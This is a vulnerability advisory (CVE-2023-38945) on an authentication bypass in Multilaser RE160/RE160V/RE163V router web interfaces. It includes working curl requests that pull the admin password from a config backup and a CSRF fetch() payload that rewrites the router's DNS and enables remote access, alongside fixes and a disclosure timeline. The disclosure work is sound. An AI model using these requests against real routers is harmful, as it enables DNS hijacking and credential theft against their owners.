Multilaser RE160V / RE160 URL Manipulation Access Bypass

=====[Tempest Security Intelligence - Security Advisory -CVE-2023-38945]=======  Access Control Bypass in Multilaser routers' Web Management Interface  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >=====[Table ofContents]========================================================1. Overview2. Detailed description3. Other contexts & solutions4. Acknowledgements5. Timeline6. References=====[1.Overview]==============================================================* Systems affected: Multilaser RE160 web interface -V5.07.51_pt_MTL01(verified)                                                   -V5.07.52_pt_MTL01(verified)                                        (other routers/versions may beaffected)                    Multilaser RE160V web interface - V12.03.01.08_pt(verified)                                                    - V12.03.01.09_pt(verified)                                        (other routers/versions may beaffected)                    Multilaser RE163V web interface - V12.03.01.08_pt(verified)                                        (other routers/versions may beaffected)* Release date: 28/02/2024* CVSS score: 7.7 / High* CVSS vector:CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N* Impact: This vulnerability allows attackers to bypass the access controlof          the routers' web interface and perform management actions, such as          changing the DNS settings, enabling router remote access,changing the          IP routing table, and retrieving the WiFi and managementapplication          passwords. A noteworthy aspect also regards the fact that theattack          can be conducted remotely.=====[2. Detaileddescription]==================================================The affected Multilaser routers have a web management interface designed tographically assist users in configuring features and diagnosing problems.However, there is a bug in its access control mechanism that allowsunauthenticated users to access routers' management features.In order to exploit this bug, it is necessary to add a specific extensionat theend of the URLs. Some acceptable extension values are: js, css, png, jpg,gif,jsp. The following example shows how an unauthenticated user (not bearing acredential or session token) could perform it by using the curl tool[1] toretrieve, for example, a backup of the RE160 router config, which containsitsweb interface password:[snippet]$ # traditional unauthenticated request being redirected to the login page$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E'HTTP/|Locatio'HTTP/1.0 302 RedirectLocation: http://[routerIpAddress]/login.asp$$ # malicious unauthenticated request getting the web interface password$ # (in this example: "pass123")$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E'HTTP/|http_pass'HTTP/1.0 200 OKhttp_passwd=pass123[/snippet]Furthermore, the next example presents part of a JavaScript code that couldbeadded to a malicious website with the purpose of changing the router's DNSaddress and enabling remote access on vulnerable RE160V and RE163V routers.This can be achieved by exploiting this access control issue and a CSRF[3]:[code]fetch('http://[routerIpAddress]/goform/setSysTools/.js', {    'method': 'POST',    'mode': 'no-cors',    'headers': {        'Content-Type': 'application/x-www-form-urlencoded'    },    'body':'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&    module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'})[/code]By performing the aforementioned steps, an attacker can gain access to allfeatures of the web interface.This vulnerability can be exploited remotely via a malicious website or amobile/desktop application performing HTTP requests against the router. Andalso locally, by connecting to a vulnerable router (such as through thewirelessinfrastructure of a coffee shop or airport).=====[3. Other contexts &solutions]============================================Conceptually, in order to fix this issue, the server receiving the requestmustalways validate the session token in authenticated features as aprerequisitefor enforcing access control, regardless of any extension in the URL. Uponnotreceiving a valid session token within the request, users should beredirectedto the login page.Practically, to mitigate this issue, the RE160V should be updated tofirmwareV12.03.01.12 or newer[4], the RE163V to firmware V12.03.01.10 or newer[5].Multilaser informed that they contacted the firmware vendor of the modelRE160,but due to the age of the equipment and its limitations, it will notreceive anupdate to fix the issue. Therefore, it is recommended to replace the RE160router with a new one that has received the fix (such as RE160V or RE163V).=====[4.Acknowledgements]======================================================  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >                              < twitter.com/palulabr >  Tempest Security Intelligence[2]=====[5.Timeline]==============================================================13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10)fixedthe bug;28/04/2023 - The bug regarding model RE160V was reported to the vendor;29/06/2023 - A new contact was made with the company;29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;07/07/2023 - The same bug in model RE160 was reported to the vendor;16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) wherethebug was fixed;26/10/2023 - Vendor informed that RE160 will not receive a fix;26/10/2023 - Vendor released the RE160V update on its website[4].=====[6.References]============================================================  [1] https://curl.se  [2] https://tempest.com.br  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152  [4]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  [5]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v